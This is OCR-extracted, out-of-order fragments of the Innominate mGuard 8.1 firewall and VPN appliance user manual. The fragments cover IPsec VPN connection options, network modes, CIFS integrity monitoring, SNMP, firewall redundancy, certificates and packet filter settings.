317. nections with a specific partner DMZ can only be selected in Router mode Here VPN con nections can be established to hosts in the DMZ and IP pack ets can be routed from the DMZ in a VPN connection Implicitly selected by the IP address specified to the right an IP address is used instead of a dedicated interface Innominate Security Technologies 259 mGuard 8 1 IPsec VPN gt gt Connections gt gt Edit gt gt General Connection startup Controlling service input 260 Innominate Security Technologies Initiate Initiate on traffic Wait Initiate The mGuard initiates the connection to the partner In the Ad dress of the remote site s VPN gateway field see above the fixed IP address of the partner or its name must be entered Initiate on traffic The connection is initiated automatically when the mGuard sees that the connection should be used Can be selected for all operating modes of the mGuard Stealth Router etc Wait The mGuard is ready to allow the connection to the mGuard that a remote partner actively initiates and establishes If Yany is entered under Address of the remote site s VPN gateway Wait must be selected Only available with the mGuard rs4000 rs2000 3G mGuard rs4000 rs2000 mGuard industrial rs None Service input CMD 1 3 The VPN connection can be switched via a connected push button switch The push button switch must be connected to one of the ser vice contacts C
318. ner The value 0 results in unlimited attempts for connections initi ated by the mGuard otherwise it results in 5 attempts Yes No When set to Yes the mGuard will attempt to negotiate a new key when the old one expires If the partner supports the Dead Peer Detection DPD protocol the relevant part ners can detect whether or not the IPsec connection is still valid and whether it needs to be established again Delay between requests for a sign of life 282 Innominate Security Technologies Duration in seconds after which DPD Keep Alive requests should be transmitted These requests test whether the part ner is still available Default setting 30 seconds 105661_en_02 IPsec VPN menu IPsec VPN gt gt Connections gt gt Edit gt gt IKE Options Timeout for absent Duration in seconds after which the connection to the partner sign of life after which should be declared dead if there has been no response to the peer is assumed dead Keep Alive requests Default setting 120 seconds If the mGuard finds that a connection is dead it re sponds according to the setting under Connec tion startup see definition of this VPN connec tion under Connection startup on the General tab page 105661_en_02 Innominate Security Technologies 283 mGuard 8 1 10 3 IPsec VPN gt gt L2TP over IPsec These settings are not applied in Stealth mode It is not possible to use the MD5 algorithm under Windows 7 The MD5
319. neral Router network mode PPTP router mode PPTP For access to the Internet the Internet service provider ISP provides the user with a user name login and password These are requested when you attempt to establish a connection to the Internet PPTP Login PPTP Password Local IP Mode Local IP Modem IP The user name login that is required by the Internet service provider when you attempt to establish a connection to the In ternet The password that is required by the Internet service provider when you attempt to establish a connection to the Internet Via DHCP If the address data for access to the PPTP server is provided by the Internet service provider via DHCP select Via DHCP In this case no entry is required under Local IP Static from field below If the address data for access to the PPTP server is not sup plied by the Internet service provider via DHCP the local IP address must be specified The IP address via which the mGuard can be accessed by the PPTP server The address of the PPTP server of the Internet service pro vider Internal Networks See Internal Networks on page 123 Secondary External Inter See Secondary External Interface on page 116 face This menu item is not included in the scope of functions for the mGuard rs2000 3G mGuard rs2000 128 Innominate Security Technologies 105661_en_02 Network menu Router network mode Modem router mo
320. network failure may have resulted in the check being unsuccessful The mGuard then attempts to connect to the configuration server again based on the new configuration that has been reapplied It then attempts to download the newly applied configuration profile again If this is unsuccessful another rollback is performed The se lection criterion is enforced again for the further cycles for loading a new configuration as often as is defined in the Number of times field 92 Innominate Security Technologies 105661_en_02 Management menu Management gt gt Central Management gt gt Configuration Pull 105661_en_02 If the value in the Number of times field is specified as 0 the selection criterion the offered configuration profile is ignored if it remains unchanged will never be enforced As a result the second of the following objectives could then no longer be met This mechanism has the following objectives 1 After applying a new configuration it must be ensured that the mGuard can still be configured from a remote location 2 When cycles are close together e g Pull Schedule 15 minutes the mGuardMGUARD must be prevented from repeatedly testing a configuration profile that might be faulty at intervals that are too short This can hinder or prevent external administrative access as the mGuard might be too busy dealing with its own pro cesses 3 External factors e g network failure must be largely rule
321. ning at the scheduled start time of the next check that next check will not be run Please note If a configuration change schedules a check to start less than one minute in the future it will start not at that time but at its next interval Please note Continuous scanning may take up to 10 minutes to start Checksum Memory Checksum Algorithm To be stored on CIFS share Basename of the checksum files May be prefixed with a directory SHA 256 v c f Mounted and usable integrity check CIFS Integrity Monitoring gt gt CIFS Integrity Checking gt gt Settings gt gt Edit gt gt Checked Share Settings Enabled Checked CIFS Share Patterns for filenames 105661_en_02 No a check is not triggered for this network drive The mGuard has not connected this drive The status cannot be viewed Yes a check is triggered regularly for this network drive Suspended the check has been suspended until further no tice The status can be viewed Name of the network drive to be checked specified under CIFS Integrity Monitoring gt gt Importable Shares gt gt Edit Specific file types are checked e g only executable files such as exe and dll The rules can be defined under CIFS Integrity Monitoring gt gt CIFS Integrity Checking gt gt Filename Patterns Do not check files that are changed in normal op eration as this could trigger false alarms Do not check files that are simultaneous
322. nitoring gt gt Im portable Shares on page 230 What type of access is permitted see CIFS Integrity Monitoring gt gt CIFS Integrity Checking gt gt Settings on page 233 Atwhat intervals the drives should be checked see CIFS Integrity Monitoring gt gt CIFS Integrity Checking gt gt Settings gt gt Edit gt gt Checked Share on page 235 Which file types should be checked see CIFS Integrity Monitoring gt gt CIFS Integrity Checking gt gt Filename Patterns on page 240 Warning method when a change is detected e g via e mail see CIFS Integrity Mon itoring gt gt CIFS Integrity Checking gt gt Settings on page 233 or via SNMP see CIFS integrity traps on page 87 Setting options for the CIFS Antivirus Scan Connector Which network drives are known to the mGuard see CIFS Integrity Monitoring gt gt Im portable Shares on page 230 What type of access is permitted read or read write access see CIFS Integrity Moni toring gt gt CIFS AV Scan Connector on page 242 105661_en_02 Innominate Security Technologies 229 m Guard 8 1 Requirements a 9 1 CIFS Integrity Monitoring gt gt Importable Shares The network drives that the mGuard should check regularly can be specified here In order for the network drives to be checked you must also refer to these network drives in one of the two methods CIFS integrity checking or CIF
323. nly then use this method After that follow these steps Replace the incorrect password with a different one Enter this password on the active mGuard too Restart the mGuard that is not active You can do this for example by reconnect ing the Ethernet cable or restoring the old settings for the connectivity check 308 Innominate Security Technologies 105661_en_02 Redundancy menu Redundancy gt gt Firewall Redundancy gt gt Redundancy Virtual interfaces External virtual Router 1 2 3 255 default 51 a Only in Router network mode This ID is sent by the redundant pair with each presence noti fication CARP via the external interface and is used to iden tify the redundant pair This ID must be the same for both mGuard devices It is used to differentiate the redundant pair from other redundant pairs that are connected to the same Ethernet segment through their external interface Please note that CARP uses the same protocol and port as VRRR Virtual Router Redundancy Protocol The ID set here must be different to the IDs on other devices which use VRRR or CARP and are located in the same Ethernet segment External virtual IP Default 10 0 0 100 addresses Only in Router network mode These are IP addresses which are shared by both mGuard de vices as virtual IP addresses of the external interface These IP addresses must be the same for both mGuard devices These addresses are used as a ga
324. nor release for versions release X y Z 3 1 0 or 4 0 1 respectively 72 Innominate Security Technologies 105661_en_02 Management menu Management gt gt Update Update Servers Specify from which servers an update may be performed a The list of servers is processed from top to bottom until an available server is found The order of the entries therefore also specifies their priority a All configured update servers must provide the same updates The following options are available Protocol The update can be performed via HTTPS or HTTP Server Host name of the server that provides the update files Via VPN The update is performed via the VPN tunnel Default No Updates via VPN are not supported if the relevant VPN tunnel has been disabled in the configuration see IPsec VPN gt gt Connections and has only been temporarily opened via the service contact or CGI interface Login Login for the server Password Password for login 105661_en_02 Innominate Security Technologies 73 m Guard 8 1 4 4 Management gt gt Configuration Profiles 4 4 1 Configuration Profiles Management Configuration Profiles Configuration Profiles Configuration Profiles status a T oo ao Factory Default Download x zehni140 Save Current Configuration Name for the new profile to Profile Note Only changes that are already applied are saved Upload Configuration to Mame for the new profile
325. ns sec tended period after the connection is closed This is neces onds sary as packets belonging to the closed TCP connection may still arrive in a packet based network after the connection is closed Without time controlled blocking old packets could be assigned to a new connection accidentally The default setting is 3600 seconds 1 hour Abort existing connec Yes No default Yes tions upon firewall When set to Yes the existing connections are reset if the fol reconfiguration lowing applies Yes is set under Allow TCP connections upon SYN only The firewall rules have been adjusted The value was changed from No to Yes even without changing the firewall rules After changing the firewall rules the mGuard behaves in the same way as after a restart However this only applies to the forwarded connections Existing TCP connections are inter rupted even if they are allowed according to the new firewall rules Connections to the device are not affected even if the firewall rules have been changed for the remote access If set to No the connections remain even if the firewall rules changed would not allow or abort them FTP Yes No If an outgoing connection is established to call data for the FTP protocol two methods of data transmission can be used With active FTP the called server establishes an additional counter connection to the caller in order to transmit data over this connect
326. nsmission protocol Service provider Spoofing anti spoofing Symmetrical encryption TCP IP Transmission Control Protocol Internet Protocol VLAN Devices that communicate with each other must follow the same rules They have to speak the same language Rules and standards of this kind are called protocols or transmission protocols Some of the more frequently used protocols are IP TCP PPP HTTP and SMTP Service providers are companies or institutions that enable users to access the Internet or online services In Internet terminology spoofing means supplying a false address Using this false Internet address a user can create the illusion of being an authorized user Anti spoofing is the term for mechanisms that detect or prevent spoofing In symmetrical encryption the same key is used to encrypt and decrypt data Two examples of symmetrical encryption algorithms are DES and AES They are fast but also increasingly difficult to administrate as the number of users increases These are network protocols used to connect two computers on the Internet IP is the base protocol UDP is based on IP and sends individual packets The packets may reach the recipient ina different order than that in which they were sent or they may even be lost TCP is used for connection security and ensures for example that data packets are for warded to the application in the correct order UDP and TCP add port numbers between 1 and
327. nt gt gt System Settings gt gt Time and Date System time state Indicates whether the mGuard system time has ever been synchronized with a currently valid time during mGuard run time If the display indicates that the mGuard system time has not been synchronized the mGuard does not per form any time controlled activities Devices without built in clock always start in Not synchro nized mode Devices with integrated clock usually start in Synchronized by hardware clock mode The state of the clock only returns to Not synchronized if the firmware is reinstalled on the device or if the built in clock has been disconnected from the power for too long Power supply of the integrated clock is ensured by the follow ing components Capacitor mGuard rs4000 rs2000 3G mGuard industrial rs Battery mGuard centerport mGuard delta or Accumulator mGuard rs4000 rs2000 mGuard pci SD mGuard delta mGuard smart In the case of the mGuard rs4000 rs2000 the accumulator lasts at least five days 36 Innominate Security Technologies 105661_en_02 Management menu Management gt gt System Settings gt gt Time and Date Time controlled activities Time controlled pick up of configuration from a configuration server This is the case when the Time Schedule setting is selected under the Management gt gt Central Management Configuration Pull menu item for the Pull Schedule setting
328. nter the desired profile name in the Name for the new profile field next to Upload Configuration to Profile e Click on Browse select and open the relevant file in the dialog box that is dis played e Click on Upload The configuration profile is loaded on the mGuard and the name assigned in step 1 appears in the list of profiles already stored on the mGuard Current state of the ECS Save the current con figuration to an ECS Automatically save configuration changes to an ECS 76 Innominate Security Technologies The current state is updated dynamically See State of the External Configuration Storage ECS in Event table on page 53 Only for mGuard rs4000 rs2000 3G mGuard rs4000 rs2000 mGuard delta mGuard pci SD mGuard pcie SD EAGLE m Guard and mGuard centerport When replacing the original device with a replacement device the configuration profile of the original device can be applied using the ECS To doso the replacement device must still use root as the password for the root user If the root password on the replacement device is not root this password must be entered in the The root password to save to the ECS field See Saving a profile to an external storage medium Only for mGuard rs4000 rs2000 3G mGuard rs4000 rs2000 mGuard delta mGuard pci SD mGuard pcie SD EAGLE mGuard and mGuard centerport When set to Yes the configuration changes are a
329. nterfaces gt gt Dial out PAP server authenti cation Server user name Server password Subsequent fields Yes No The following two entry fields are shown when Yes is selected User name and password that the mGuard requests from the server The mGuard only allows the connection if the server returns the agreed user name password combination See under If None is selected as the authentication method on page 133 If authentication is via CHAP Authentication CHAP w Local name Remote name Secret for client authentication CHAP server authentication No w Dial on demand Yes wv idle timeout Yes wv idle time seconds 300 LocaliP 0 0 0 0 Remote IP 0 0 0 0 Netmask 0 0 0 0 Local name Remote name Secret for client au thentication CHAP server authenti cation Secret for server au thentication 132 Innominate Security Technologies A name for the mGuard that it uses to log into the Internet ser vice provider The service provider may have several custom ers and it uses this name to identify who is attempting to dial in After the mGuard has logged into the Internet service provider with this name the service provider also compares the pass word specified for client authentication see below The connection can only be established successfully if the name is known to the service provider and the password matches A name given to the mGuard by the Internet service provider for id
330. o protect a slow computer from overloading in the protected network The Egress Queues feature can be used for all interfaces and for VPN connections 12 2 1 Internal External External 2 Dial in Internal settings for egress queues on the LAN interface QoS Egress Queues Internal External External 2 Dial in Enabling Enable Egress QoS No wv Total Bandwidth Rate Bandwidth Rate Limit unlimited Queues 1 Urgent 10 unlimited High v Important unlimited Medium w 2 3 Default unlimited Medium wv 4 Low Priority unlimited Low v External settings for egress queues on the external WAN interface QoS Egress Queues internat Externat External2 piain Enabling Enable Egress QoS No w Total Bandwidth Rate Bandwidth Rate Limit unlimited kits w 1 Urgent unlimited High v important unlimited Medium w 2 3 Default unlimited Medium w 4 Low Priority unlimited Low v 296 Innominate Security Technologies 105661_en_02 QoS menu External 2 settings for egress queues on the secondary external interface QoS Egress Queues Enabling Queues 10 unlimited High v m 1 Urgent unlimited Medium wv important unlimited Medium w Default Low Priority unlimited Low v Dial in settings for egress queues for packets for a PPP dial up connection dial in QoS Egress Queues Total Bandwidth Rate Band
331. o umlauts no special characters no control characters The text is freely definable You can use blocks from the event table which can be inserted as wildcards in plain text A and V or in machine readable form a and v Incoming text messages can be used to start or stop VPN connections The text message must contain a preconfigured token and the corresponding command for the relevant VPN connection Text message com mand Last incoming text message Current incoming voice call Send text message Recipient number 178 Message Send text message now Innominate Security Technologies vpn start lt token gt vpn stop lt token gt The token is defined in the VPN settings IPsec VPN gt gt Con nections gt gt Edit gt gt General Token for text message trigger Displays the last text message received Displays the telephone number of the current incoming caller Enter the telephone number of the recipient of the text mes sage 22 characters maximum Here you can enter the text that is sent as an text message 160 characters maximum 7 bit ASCII no umlauts no special characters no control characters The message is sent when you click the button 105661_en_02 Network menu 6 7 4 Positioning system General SIM Settings Text message Notifications Positioning system Settings Enable Positioning engine Yes w Update Systemtime Yes w Current position Validity of the po
332. ocally installed remote certificate on the mGuard To check the authenticity of possible partners in accordance with X 509 the method described below of consulting CA certificates can be used instead or as an additional measure depending on the application CA certificates provide a way of checking whether the certificate shown by the partner is re ally signed by the CA specified in the partner s certificate A CA certificate is available as a file from the relevant CA file name extension cer pem or crt For example this file may be available to download from the website of the relevant CA The mGuard can then check if the certificate shown by the partner is authentic using the CA certificates loaded on the mGuard However this requires all CA certificates to be made available to the mGuard in order to form a chain with the certificate shown by the partner In addition to the CA certificate from the CA whose signature appears on the certificate shown by the partner to be checked this also includes the CA certificate of the superordinate CA and so forth up to the root certificate see glossary under CA certificate on page 357 Authentication using CA certificates enables the number of possible partners to be ex tended without any increased management effort because it is not compulsory to install a remote certificate for each possible partner Innominate Security Technologies 191 mGuard 8 1 Creation of certificates To
333. ods are defined Login restricted to X 509 client certificate Login with X 509 client certificate or password You must then specify how the mGuard authenticates the remote user according to X 509 The table below shows which certificates must be provided for the mGuard to authenticate the user access via HTTPS if the user or their browser shows one of the following certifi cate types when a connection is established A certificate signed by a CA A self signed certificate For additional information about the table see Authentication gt gt Certificates on page 190 The partner shows the Certificate specific to individ Certificate specific to indi following ual signed by CA vidual self signed The mGuard authenti cates the partner using af All CA certificates that form Remote certificate the chain to the root CA certif icate together with the certifi cate shown by the partner PLUS if required Remote certificates if used as a filter 1 The partner can additionally provide sub CA certificates In this case the mGuard can form the set union for creating the chain from the CA certificates provided and the self configured CA certificates The corre sponding root certificate must always be available on the mGuard According to this table the certificates that must be provided are the ones the mGuard uses to authenticate a remote user access via HTTPS or their browser The foll
334. oes not send it then Stealth configuration must be set to static In this case further entry fields are available for the Static Stealth Configuration at the bottom of the page multiple clients Default As with autodetect but it is possible to connect more than one computer to the LAN port Secure port of the mGuard meaning that multiple IP addresses can be used at the LAN port secure port of the mGuard No Yes Only with autodetect stealth configuration if a Windows com puter has more than one network card installed it may alter nate between the different IP addresses for the sender ad dress in the data packets it sends This applies to network packets that the computer sends to TCP port 139 NetBIOS As the mGuard determines the address of the computer from the sender address and thus the address via which the mGuard can be accessed the mGuard would have to switch back and forth and this would hinder operation considerably To avoid this set this option to Yes if the mGuard has been connected to a computer that has these properties Innominate Security Technologies 113 mGuard 8 1 Network gt gt Interfaces gt gt General Stealth network mode Stealth Management IP Address 114 Innominate Security Technologies Management Paderesses a oe PTC TET AX 192 168 11 1 255 255 255 0 No v 1 T 192 168 5 1 255 255 255 0 No wv 1 Default gateway 192 163 11 10 An additional IP address can be specifie
335. of a service on the LAN side creates an entry in the connection tracking table which enables a different incoming request from an external peer This peer passes the firewall using the same parameters however it is not connected to the firewall rule record There are two ways to set up the mGuard so that it interrupts the associated connections when deactivating the firewall rule record Activate the Allow TCP connections upon SYN only option under Network Security gt gt Packet Filter gt gt Advanced Inthe firewall block the outgoing connections that operate via the port that is the desti nation for the incoming connections If for example the firewall rule record enables incoming data traffic on port 22 an out going rule can be set up that deactivates any data traffic coming from port 22 214 Innominate Security Technologies 105661_en_02 Network Security menu 8 1 5 MAC Filtering Incoming Rules Outgoing Rules DMZ Rule Records MAC Filtering Advanced Incoming a XXXXXXXXXXXX SOCK OOOO Yoany Accept v Ethernet Protocol may be any IPv4 ARP Length or a hexadecimal value Please note These rules only apply to the Stealth mode Please note Management access to 1 1 1 1 requires ARP resolution of the default gateway Restricting ARP traffic to the default gateway may lead to management access problems Outgoing T XXXXXXXXXXXX XXXXXXXXXXXX any Accept Drop The Incoming
336. of one another In this case each mGuard deals with its own tracking information as the two mGuard devices can no longer communicate via layer 2 A network lobotomy can be triggered by a rare and unfortunate combination of network settings net work failures and firewall redundancy settings Each mGuard is active during a network lobotomy The following occurs after the network lobotomy has been rectified if the mGuard devices have different priorities the device with the higher priority becomes active and the other switches to standby If both mGuard de vices have the same priority an identifier sent with the presence notifications CARP de termines which mGuard becomes active Both mGuard devices manage their own firewall state during the network lobotomy The ac tive mGuard retains its state Connections on the other mGuard which were established during the lobotomy are dropped Fail over when establishing complex connections Complex connections are network protocols which are based on different IP connections One example of this is the FTP protocol In an FTP protocol the client establishes a control channel fora TCP connection The server is then expected to open another TCP connection over which the client can then transmit data The data channel on port 20 of the server is set up while the control channel on port 21 of the server is being established If the relevant connection tracking function is activated on the mGuard see
337. of the list of entries until an appropriate rule is found This rule is then applied If the list of rules con tains further subsequent rules that could also apply these rules are ignored The rules specified here only take effect if Enable SSH remote access is set to Yes nternal access is also possible when this option is set to No A firewall rule that would refuse nternal access does therefore not apply in this case The following options are available From IP Enter the address of the computer or network from which re mote access is permitted or forbidden in this field The following options are available IP address 0 0 0 0 0 means all addresses To specify an ad dress area use CIDR format see CIDR Classless Inter Do main Routing on page 24 Interface External Internal External 2 VPN Dial in External 2 and Dial in are only for devices with a serial inter face see Network gt gt Interfaces on page 105 Specifies to which interface the rule should apply If no rules are set or if no rule applies the following default set tings apply SSH access is permitted via nternal VPN and Dial in Ac cess via External and External 2 is refused Specify the access options according to your requirements NOTE If you want to refuse access via Internal VPN or Dial in you must implement this explic itly by means of corresponding firewall rules for example by specifying Drop as an action To pre
338. of the mGuard is deac tivated and data traffic is transferred to and from the WAN via the externally accessible se rial interface serial port of the mGuard An external modem which establishes the connection to the telephone network is con nected to the serial port The connection to the WAN or Internet is then established via the telephone network by means of the external modem If the address of the mGuard is changed e g by changing the network mode from Stealth to Router the device can only be accessed via the new address If the configura tion is changed via the LAN port confirmation of the new address is displayed before the change is applied If configuration changes are made via the WAN port no confirmation is displayed If the mode is set to Router PPPoE or PPTP and you then change the IP address of the LAN port and or the local subnet mask make sure you specify the correct values Other wise the mGuard may no longer be accessible under certain circumstances For the further configuration of Built in mobile network modem Built in Modem Modem network mode see Router network mode Modem router mode on page 129 Router Mode Built in Modem Only used for mGuard industrial rs devices with a built in modem or ISDN terminal adapt er If Built in modem network mode is selected the external Ethernet interface of the mGuard is deactivated and data is transferred to and from the WAN via the built in modem or b
339. of the mobile network connection To do so you need to set the GSM_DEBUG variable to yes via the console or SNMP 6 7 1 General General SIM Settings Text message Notifications Positioning system Mobile network state Power state of the mobile network Engine is powered up Positioning enol Signallevel 67 dbm 74 Local Area Code and Cel D ofthe LAC 0136 base station CID 0D0043B PLMN 26202 Radio Access Technology 3G UMTS with HSDPA and HSUPA available PPP connection Offline Provider Current Provider Vodafone de Provider selection Generic GSM 3G UMTS Provider w Radio Settings GSM Frequencies World all frequencies v 3G UMTS Frequencies World all frequencies v CDMA Frequencies CDMA 800 1900 MHZ w Connection Supervision Daily relogin No w Daily relogin at 0 ho m Mobile Network Supervision Probe status The network probes are disabled Probe taroets X F ICMP Ping w 141 1 1 1 Telekom APN 1 F ICMP Ping v 141 1 1 2 Telekom APN 2 Probe Interval minutes 5 Number of times all probes need to fail before the mobile network 3 connection is considered stalled Innominate Security Technologies 169 mGuard 8 1 Network gt gt Mobile Network gt gt General Mobile network state Power state of the mobile network Posi tioning engine Signal strength Local Area Code and Cell ID of the base sta tion Radio Access Tech nology PPP connection Provid
340. ofile created under a newer firmware version should not be loaded and will be rejected 74 Innominate Security Technologies 105661_en_02 Encrypted configuration memory Management menu In the case of platform 2 mGuard and firmware 7 6 1 or later the configuration storage ECS and configuration profile ATV can be encrypted This makes the rollout easier You can save several mGuard configurations on an SD card and then use it to startup all mGuards During the startup process the mGuard finds the valid configurations on the SD card This is loaded decrypted and used as a valid configuration see Encrypt the data on the ECS on page 77 Management gt gt Configuration Profiles Configuration Profiles Save Current Configuration to Profile 105661_en_02 At the top of the page there is a list of the configuration profiles that are stored on the mGuard e g the Factory Default configuration profile If any configuration profiles have been saved by the user see below they will be listed here I Active configuration profile the configuration profile that is currently enabled has an Active symbol at the start of the entry Configuration profiles that are stored on the mGuard can be Enabled Saved as a file on the connected configuration computer Deleted Displayed Displaying the configuration profile e Click on the name of the configuration profile in the list Enabling the factory default or a confi
341. ol to which the rule should apply TCP UDP GRE GRE GRE protocol IP packets can be forwarded However only one GRE connection is supported at any given time If more than one device sends GRE packets to the same external IP address the mGuard may not be able to feed back reply pack ets correctly We recommend only forwarding GRE packets from specific transmitters These could be ones that have had a forwarding rule set up for their source address by entering the transmitter address in the From IP field e g 193 194 195 196 32 From IP The sender address for forwarding 0 0 0 0 0 means all addresses To specify an address area use CIDR format see CIDR Classless Inter Domain Rout ing on page 24 From Port The sender port for forwarding any refers to any port Either the port number or the corresponding service name can be specified here e g 0003 for port 110 or http for port 80 105661_en_02 Innominate Security Technologies 155 mGuard 8 1 Network gt gt NAT gt gt IP and Port Forwarding Incoming on IP Specify the external IP address or one of the external IP addresses of the mGuard here or Usethe variable extern if the external IP address of the mGuard is changed dynamically so that the external IP address cannot be specified If multiple static IP addresses are used for the WAN port the extern variable always refers to the first IP address in the list Incoming on Port The ori
342. ollowing intentional manipulation of the rel evant files of the network drive Unauthorized manipulation of the relevant files cannot be detected if there is no valid integrity database 232 Innominate Security Technologies 105661_en_02 9 2 1 Settings CIFS Integrity Monitoring menu CIFS Integrity Monitoring CIFS Integrity Checking Settings Filename Patterns General Integrity certificate Used to sign integrity databases Send notifications via e mail Target address for e mail notifications Subject prefix for e mail notifications UC2 w Just in case of a failure or difference w cifs integrity example com Message from CIFS integrity monitoring Checking of Shares gt x p x Differences found during last check 2 Yes v v Mounted and usable C v Mounted and usable E No X System32 v System32 Edit CIFS Integrity Monitoring gt gt CIFS Integrity Checking gt gt Settings General 105661 _en_02 Integrity certificate used to sign integrity databases Send notifications via e mail E mail address for notifications Start of the subject for e mail notifications Used for signing and checking the integrity database so that it cannot be replaced or manipulated by an intruder without being detected For information about certificates please refer to Machine Certificates on page 197 After every check an e mail is sent to the address specified below after every check
343. ologies 105661_en_02 VPN Virtual Private Network 105661_en_02 Glossary A Virtual Private Network VPN connects several separate private networks subnetworks via a public network e g the Internet to form a single common network A cryptographic protocol is used to ensure confidentiality and authenticity A VPN is therefore an inexpen sive alternative to using permanent lines for building a nationwide company network Innominate Security Technologies 365 mGuard 8 1 366 Innominate Security Technologies 105661_en_02
344. ols any refers to any port gstartport endport e g 110 120 refers to a port area Individual ports can be specified using the port number or the corresponding service name e g 110 for pop3 or pops for 110 Accept means that the data packets may pass through Reject means that the data packets are sent back and the sender is informed of their rejection In Stealth mode Reject has the same effect as Drop Drop means that the data packets are not permitted to pass through They are discarded which means that the sender is not informed of their whereabouts Name of rule sets if defined When a name is specified for rule sets the firewall rules saved under this name take effect see Rule Records tab page Freely selectable comment for this rule For each individual firewall rule you can specify whether the use of the rule Should be logged set Log to Yes Should not be logged set Log to No default settings When set to Yes all connection attempts that are not covered by the rules defined above are logged Default settings No Innominate Security Technologies 211 m Guard 8 1 8 1 4 Rule Records Network Security Packet Filter Incoming Rules Outgoing Rules DMZ RuleRecords MACFiltering Advanced IJ Rule Records a p Active v None Active unnamed Network Security gt gt Packet Filter gt gt Rule Records Rule Records Initial Mo
345. omain workgroup Ins dio erene NetBIOS name Win dows 95 98 only Login Password 105661_en_02 Name of the network drive to be checked Internal name used in the configuration IP address of the server whose network drive is to be checked Directory on the above authorized server that is to be checked Name of the workgroup to which the network drive belongs NetBIOS name for Windows 95 98 computers Login for the server Password for login Innominate Security Technologies 231 mGuard 8 1 9 2 CIFS Integrity Monitoring gt gt CIFS Integrity Check ing When CIFS integrity checking is performed the Windows network drives are checked to determine whether certain files e g exe dll have been changed Changes to these files indicate a possible virus or unauthorized intervention Integrity database If a network drive that is to be checked is reconfigured an integrity database must be cre ated This integrity database is used as the basis for comparison when checking the network drive regularly The checksums of all files to be monitored are recorded here The integrity data base is protected against manipulation The database is either created explicitly due to a specific reason see C FS Integrity Moni toring gt gt CIFS Integrity Checking gt gt Settings gt gt Edit gt gt Management Possible Actions or on the first regular check of the drive The integrity database must be created again f
346. ominate Security Technologies 79 mGuard 8 1 If SNMPv3 or SNMPv1 v2 is activated this is indicated by a green signal field on the tab at the top of the page Otherwise i e if SNMPv3 or SNMPv1 v2 is not active the signal field is red Processing an SNMP request may take more than one second However this value cor responds to the default timeout value of some SNMP management applications e If you experience timeout problems set the timeout value of your management appli cation to values between 3 and 5 seconds Management gt gt SNMP gt gt Query Settings Enable SNMPv3 If you wish to allow monitoring of the mGuard via SNMPv3 set access Yes No this option to Yes The firewall rules for the available interfaces must be defined on this page under Allowed Networks in order to specify differentiated access and moni toring options on the mGuard Access via SNMPv8 requires authentication with a login and password The default settings for the login parameters are Login admin Password SnmpAdmin please note that the password is case sensitive MD5 is supported for the authentication process DES is sup ported for encryption The login parameters for SNMPv3 can only be changed using SNMPvs Enable SNMPv1 v2 If you wish to allow monitoring of the mGuard via SNMPv1 v2 access Yes No set this option to Yes You must also enter the login data under SNMPv1 v2 Com munity The firewall rules for the avail
347. on must be in place otherwise the connectivity check will fail ICMP echo requests can also be sent optional The ICMP echo requests can be set using the Redundancy gt gt Firewall Redundancy gt gt Connectivity Checks menu Availability check On each mGuard in a redundant pair checks are also constantly performed to determine whether an active mGuard is available and whether it should remain active A variation of the CARP Common Address Redundancy Protocol is used here The active mGuard constantly sends presence notifications through its internal and external network interface while both mGuard devices listen If a dedicated Ethernet link for state synchronization of the firewall is available the presence notification is also sent via this link In this case the presence notification for the external network interface can also be sup pressed The availability check fails if an mGuard does not receive any presence notifications within a certain time The check also fails if an mGuard receives presence notifications with a lower priority than its own The data is always transmitted through the physical network interface and never through the virtual network interface 332 Innominate Security Technologies 105661_en_02 Redundancy State synchronization The mGuard on standby receives a copy of the state of the mGuard that is currently active This includes a database containing the forwarded network connections This databas
348. onfiguration of SSH Management gt gt System Settings Shell Access menu HTTPS Management gt gt Web Settings Access menu VPN connections IPsec VPN gt gt Connections menu the certificates imported on the mGuard are provided in a selection list The certificates are displayed under the short name specified for each certificate in this selection list Name as signment is mandatory Creating a certificate copy A copy can be created from the imported CA certificate To do this proceed as follows e Click on Current Certificate File next to the Download Certificate row for the relevant CA certificate A dialog box opens in which you can enter the required information 200 Innominate Security Technologies 105661_en_02 Authentication menu 7 4 4 Remote Certificates A remote certificate is a copy of the certificate that is used by a partner to authenticate itself to the mGuard Remote certificates are files file name extension cer pem or crt received from possi ble partners by trustworthy means You load these files on the mGuard so that reciprocal authentication can take place The remote certificates of several possible partners can be loaded The remote certificate for authentication of a VPN connection or the channels of a VPN connection is installed in the Psec VPN gt gt Connections menu For a more detailed explanation see Authentication gt gt Certificates on page 190 Ex
349. onfiguration permits this As in Router network mode VPN data traffic can flow to and from the locally connected computers Because this traffic is encrypted by the mGuard it is seen as being generated by the mGuard In Router network mode All data traffic i e from and to locally connected computers generated by the mGuard can be routed to the external network WAN via the secondary external interface Secondary External Interface Network Mode Off v Network Mode Off Modem Built in mobile network modem Off Default Select this setting if the operating environment of the mGuard does not require a secondary external interface You can then use the serial interface or the built in modem if pres ent for other purposes see Modem Console on page 139 Modem Built in Modem If you select one of these options the secondary external in terface will be used to route data traffic permanently or tempo rarily to the external network WAN The secondary external interface is created via the serial inter face of the mGuard and an external modem connected to it Built in mobile network modem Firmware 5 2 or later supports an external or internal modem as a fallback for the external interface From Version 8 0 this also includes the internal mobile network modem of the m Guard rs4000 3G The modem can be used permanently as the secondary exter nal interface In the event of a network error it can also be used t
350. or each setting is listed below A more detailed description can be found in the MIB that belongs to the mGuard must be located in the network that is specified as the Remote network in the definition of the VPN connection a If SNMP traps are sent to the partner via a VPN channel the IP address of the partner The internal IP address must be located in the network that is specified as Local in the definition of the VPN connection see IPsec VPN gt gt Connections gt gt Edit gt gt General Ifthe IPsec VPN gt gt Connections gt gt Edit gt gt General Local option is set to 1 1 NAT see Page 263 the following applies The internal IP address must be located in the specified local network 105661_en_02 Innominate Security Technologies 83 mGuard 8 1 Ifthe IPsec VPN gt gt Connections gt gt Edit gt gt General Remote option is set to 1 1 NAT see Page 265 the following applies The IP address of the SysLog server must be located in the network that is specified as Remote in the definition of the VPN connection Management gt gt SNMP gt gt Trap Basic traps SNMP authentication Link Up Down Coldstart Admin access SSH HTTPS new DHCP client 84 Innominate Security Technologies Activate traps Yes No enterprise oid mGuardinfo generic trap authenticationFailure specific trap 0 Sent if an unauthorized station attempts to access the mGuard SNMP agent Acti
